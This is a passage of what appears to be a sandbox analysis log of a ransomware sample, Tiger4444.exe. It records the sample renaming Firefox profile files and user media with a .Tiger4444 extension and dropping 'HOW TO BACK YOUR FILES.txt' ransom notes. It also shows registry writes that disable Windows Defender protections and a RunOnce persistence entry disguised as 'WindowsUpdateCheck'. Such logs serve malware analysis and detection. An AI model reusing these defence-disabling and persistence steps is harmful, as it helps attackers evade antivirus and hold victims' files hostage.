Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js type = size, size_out = 5171 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SiteSecurityServiceState.txt type = size, size_out = 1822 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite type = size, size_out = 512 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\times.json type = size, size_out = 29 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite type = size, size_out = 98304 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\xulstore.json type = size, size_out = 351 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata type = size, size_out = 46 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2 type = size, size_out = 59 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite type = size, size_out = 122880 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata type = size, size_out = 29 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2 type = size, size_out = 42 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite type = size, size_out = 49152 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js type = size, size_out = 7991 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622 type = size, size_out = 14047 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info type = size, size_out = 116 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json type = size, size_out = 161 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json type = size, size_out = 51 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4 type = size, size_out = 3036 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4 type = size, size_out = 6489 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4 type = size, size_out = 5947 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4 type = size, size_out = 6538 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4 type = size, size_out = 6760 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4 type = size, size_out = 66 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622 type = size, size_out = 10 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt type = size, size_out = 479 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json type = size, size_out = 348 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib type = size, size_out = 2456 True 1
Fn
Move C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\rjtTtY.flv.Tiger4444 source_filename = C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\rjtTtY.flv, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-shm.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-shm, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-wal.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-wal, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-shm.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-shm, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-wal.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-wal, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SiteSecurityServiceState.txt.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SiteSecurityServiceState.txt, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\times.json.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\times.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\xulstore.json.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\xulstore.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib.Tiger4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
For performance reasons, the remaining 976 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (11)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\HomeGroup - True 1
Fn
Create Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender - True 1
Fn
Create Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager - True 1
Fn
Create Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce - True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\HomeGroup value_name = DisableHomeGroup, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender value_name = DisableAntiSpyware, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value_name = DisableRealtimeMonitoring, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value_name = DisableBehaviorMonitoring, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value_name = DisableOnAccessProtection, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce value_name = WindowsUpdateCheck, data = C:\Users\FD1HVy\Desktop\Tiger4444.exe, size = 74, type = REG_SZ True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\WINDOWS\system32\cmd.exe os_pid = 0xc04, show_window = SW_HIDE True 1
Fn
Module (1303)
»
Operation Module Additional Information Success Count Logfile
Load api-ms-win-core-synch-l1-2-0 base_address = 0x74ea0000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x74ea0000 True 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x74ea0000 True 1
Fn
Load kernel32 base_address = 0x75e90000 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\tiger4444.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Tiger4444.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = InitializeCriticalSectionEx, address_out = 0x74f97060 True 2
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = FlsAlloc, address_out = 0x74f9bea0 True 2
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = FlsSetValue, address_out = 0x74f92550 True 2
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = FlsGetValue, address_out = 0x74f870c0 True 1
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = LCMapStringEx, address_out = 0x74f7ed00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x75ea4280 True 1
Fn
Create Mapping Z:\HOW TO BACK YOUR FILES.txt filename = Z:\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping Z:\System Volume Information\tracking.log filename = Z:\System Volume Information\tracking.log, protection = PAGE_READWRITE, maximum_size = 21248 True 1
Fn
Create Mapping Z:\Recovery\HOW TO BACK YOUR FILES.txt filename = Z:\Recovery\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\BOOTNXT filename = C:\BOOTNXT, protection = PAGE_READWRITE, maximum_size = 784 True 1
Fn
Create Mapping C:\HOW TO BACK YOUR FILES.txt filename = C:\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\bootsect.exe filename = C:\Windows10Upgrade\bootsect.exe, protection = PAGE_READWRITE, maximum_size = 119248 True 1
Fn
Create Mapping Z:\Recovery\WindowsRE\boot.sdi filename = Z:\Recovery\WindowsRE\boot.sdi, protection = PAGE_READWRITE, maximum_size = 3171072 True 1
Fn
Create Mapping C:\Windows10Upgrade\DW20.EXE filename = C:\Windows10Upgrade\DW20.EXE, protection = PAGE_READWRITE, maximum_size = 644560 True 1
Fn
Create Mapping Z:\Recovery\WindowsRE\ReAgent.xml filename = Z:\Recovery\WindowsRE\ReAgent.xml, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping Z:\Recovery\WindowsRE\Winre.wim filename = Z:\Recovery\WindowsRE\Winre.wim, protection = PAGE_READWRITE, maximum_size = 491778272 True 1
Fn
Create Mapping C:\Windows10Upgrade\DWTRIG20.EXE filename = C:\Windows10Upgrade\DWTRIG20.EXE, protection = PAGE_READWRITE, maximum_size = 46544 True 1
Fn
Create Mapping C:\Windows10Upgrade\EnableWiFiTracing.cmd filename = C:\Windows10Upgrade\EnableWiFiTracing.cmd, protection = PAGE_READWRITE, maximum_size = 10592 True 1
Fn
Create Mapping C:\Windows10Upgrade\GatherOSState.EXE filename = C:\Windows10Upgrade\GatherOSState.EXE, protection = PAGE_READWRITE, maximum_size = 565712 True 1
Fn
Create Mapping C:\Windows10Upgrade\GetCurrentRollback.EXE filename = C:\Windows10Upgrade\GetCurrentRollback.EXE, protection = PAGE_READWRITE, maximum_size = 74192 True 1
Fn
Create Mapping C:\Windows10Upgrade\HttpHelper.exe filename = C:\Windows10Upgrade\HttpHelper.exe, protection = PAGE_READWRITE, maximum_size = 28624 True 1
Fn
Create Mapping C:\Windows10Upgrade\PostOOBEScript.cmd filename = C:\Windows10Upgrade\PostOOBEScript.cmd, protection = PAGE_READWRITE, maximum_size = 1360 True 1
Fn
Create Mapping C:\Windows10Upgrade\upgrader_default.log filename = C:\Windows10Upgrade\upgrader_default.log, protection = PAGE_READWRITE, maximum_size = 250960 True 1
Fn
Create Mapping C:\Windows10Upgrade\upgrader_win10.log filename = C:\Windows10Upgrade\upgrader_win10.log, protection = PAGE_READWRITE, maximum_size = 21328 True 1
Fn
Create Mapping C:\Windows10Upgrade\Windows10UpgraderApp.exe filename = C:\Windows10Upgrade\Windows10UpgraderApp.exe, protection = PAGE_READWRITE, maximum_size = 1416656 True 1
Fn
Create Mapping C:\Windows10Upgrade\WinREBootApp32.exe filename = C:\Windows10Upgrade\WinREBootApp32.exe, protection = PAGE_READWRITE, maximum_size = 26064 True 1
Fn
Create Mapping C:\Windows10Upgrade\WinREBootApp64.exe filename = C:\Windows10Upgrade\WinREBootApp64.exe, protection = PAGE_READWRITE, maximum_size = 26576 True 1
Fn
Create Mapping C:\Windows10Upgrade\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
